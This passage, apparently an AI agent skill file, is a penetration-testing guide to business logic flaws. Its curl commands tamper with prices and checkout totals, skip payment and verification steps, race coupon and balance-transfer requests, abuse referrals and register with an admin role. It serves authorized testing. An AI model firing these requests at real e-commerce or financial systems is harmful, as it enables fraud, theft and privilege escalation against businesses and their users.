testing-for-business-logic-vulnerabilities

What this skill does

# Testing for Business Logic Vulnerabilities

## When to Use

- During authorized penetration tests when automated scanners have found few technical vulnerabilities
- When assessing e-commerce platforms for pricing, cart, and payment flow manipulations
- For testing multi-step workflows (registration, checkout, approval processes) for bypass opportunities
- When evaluating rate-limited features like vouchers, coupons, referrals, and rewards systems
- During security assessments of financial applications, voting systems, or any application with critical business rules

## Prerequisites

- **Authorization**: Written penetration testing agreement covering business logic testing
- **Burp Suite Professional**: For intercepting and modifying multi-step request flows
- **Application understanding**: Thorough knowledge of the application's intended business workflows
- **Multiple test accounts**: Accounts at different privilege levels and states
- **Browser DevTools**: For examining client-side validation logic
- **Documentation**: Business requirements or user stories describing expected behavior

## Workflow

### Step 1: Map Business Workflows and Rules

Document all critical business processes and their expected constraints.

```
# Critical business flows to map:
# 1. Registration/Onboarding flow
#    - Email verification requirements
#    - Account approval process
#    - Role assignment logic

# 2. E-commerce/Purchase flow
#    - Product selection → Cart → Checkout → Payment → Confirmation
#    - Price calculation logic
#    - Discount/coupon application
#    - Quantity limits
#    - Shipping cost calculation

# 3. Authentication/Authorization flow
#    - Login → MFA → Dashboard
#    - Password reset → Token → New password
#    - Role escalation/approval

# 4. Financial transactions
#    - Balance check → Transfer → Confirmation
#    - Withdrawal limits
#    - Currency conversion

# Document expected constraints:
# - Minimum order amounts
# - Maximum quantity per item
# - Coupon usage limits (one per user)
# - Referral reward caps
# - Withdrawal daily limits
# - Account verification requirements before certain actions
```

### Step 2: Test Price and Quantity Manipulation

Intercept and modify price, quantity, and total values in requests.

```bash
# Test negative quantity
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"product_id": 1, "quantity": -1, "price": 99.99}' \
  "https://target.example.com/api/cart/add"

# Test zero price
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"product_id": 1, "quantity": 1, "price": 0}' \
  "https://target.example.com/api/cart/add"

# Test extremely large quantity
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"product_id": 1, "quantity": 999999999}' \
  "https://target.example.com/api/cart/add"

# Test decimal/float manipulation
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"product_id": 1, "quantity": 0.001, "price": 0.01}' \
  "https://target.example.com/api/cart/add"

# Test integer overflow
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"product_id": 1, "quantity": 2147483647}' \
  "https://target.example.com/api/cart/add"

# Modify total amount directly in checkout request
# Intercept in Burp and change total from 299.99 to 0.01
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"cart_id": "abc123", "total": 0.01, "payment_method": "card"}' \
  "https://target.example.com/api/checkout"
```

### Step 3: Test Workflow Step Bypass

Attempt to skip required steps in multi-step processes.

```bash
# Skip email verification
# Instead of: Register → Verify email → Access dashboard
# Try: Register → Access dashboard directly
curl -s -H "Authorization: Bearer $UNVERIFIED_TOKEN" \
  "https://target.example.com/api/dashboard"

# Skip payment step
# Instead of: Cart → Shipping → Payment → Confirmation
# Try: Cart → Confirmation (skip payment)
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"cart_id": "abc123", "shipping_address": "123 Main St"}' \
  "https://target.example.com/api/orders/confirm"

# Skip MFA step
# Instead of: Login → MFA → Dashboard
# Try: Login → Dashboard (skip MFA)
# After successful password auth, directly access protected resources

# Skip approval process
# Instead of: Submit request → Manager approval → Access granted
# Try: Submit request → Access granted (skip approval)

# Repeat a step that should be one-time
# Apply same coupon code multiple times
for i in $(seq 1 5); do
  curl -s -X POST \
    -H "Authorization: Bearer $TOKEN" \
    -H "Content-Type: application/json" \
    -d '{"coupon_code": "DISCOUNT50"}' \
    "https://target.example.com/api/cart/apply-coupon"
  echo "Attempt $i"
done
```

### Step 4: Test Race Conditions in Business Logic

Exploit timing windows in concurrent request processing.

```bash
# Race condition on coupon application
# Send multiple identical requests simultaneously
for i in $(seq 1 10); do
  curl -s -X POST \
    -H "Authorization: Bearer $TOKEN" \
    -H "Content-Type: application/json" \
    -d '{"coupon_code": "ONETIME50"}' \
    "https://target.example.com/api/cart/apply-coupon" &
done
wait

# Race condition on balance transfer
# If user has $100, try to transfer $100 to two accounts simultaneously
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"to": "user_b", "amount": 100}' \
  "https://target.example.com/api/transfer" &

curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"to": "user_c", "amount": 100}' \
  "https://target.example.com/api/transfer" &
wait

# Race condition on reward claiming
# Using Burp Turbo Intruder for precise timing:
# 1. Send request to Turbo Intruder
# 2. Use race condition script template
# 3. Send 20+ requests simultaneously
# 4. Check if reward was claimed multiple times
```

### Step 5: Test Referral and Reward System Abuse

Find ways to exploit promotional features and reward mechanisms.

```bash
# Self-referral: refer your own email
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"referral_email": "[email protected]"}' \
  "https://target.example.com/api/referrals/invite"

# Referral code reuse across multiple accounts
# Create multiple accounts and use same referral code

# Coupon stacking: apply multiple discount codes
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"coupon_codes": ["SAVE10", "WELCOME20", "VIP50"]}' \
  "https://target.example.com/api/cart/apply-coupons"

# Abuse free trial: re-register with same details
# Test if [email protected] or [email protected] bypass duplicate detection

# Gift card / credit manipulation
# Buy gift card with gift card balance (circular)
# Apply gift card with value > purchase price (get change as credit)

# Test reward point manipulation
# Earn points on order → Cancel order → Keep points
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN" \
  "https://target.example.com/api/orders/12345/cancel"
# Check if reward points from order 12345 were revoked
```

### Step 6: Test Role and Permission Logic

Assess authorization logic for privilege escalation through business processes.

```bash
# Role escalation via registration parameter
curl -s -X POST \
  -H "Content-Type: application/json" \
  -d '{"email":"[email protected]","password":"Test1234!","role":"admin"}' \
  "https://target.example.com/api/auth/register"

# Organization tenant boundary testing
# User in Org A tries to access Org B resources via business workflows
curl -s -X POST \
  -H "Authorization: Bearer $TOKEN_ORG_A" \
  -H "Conten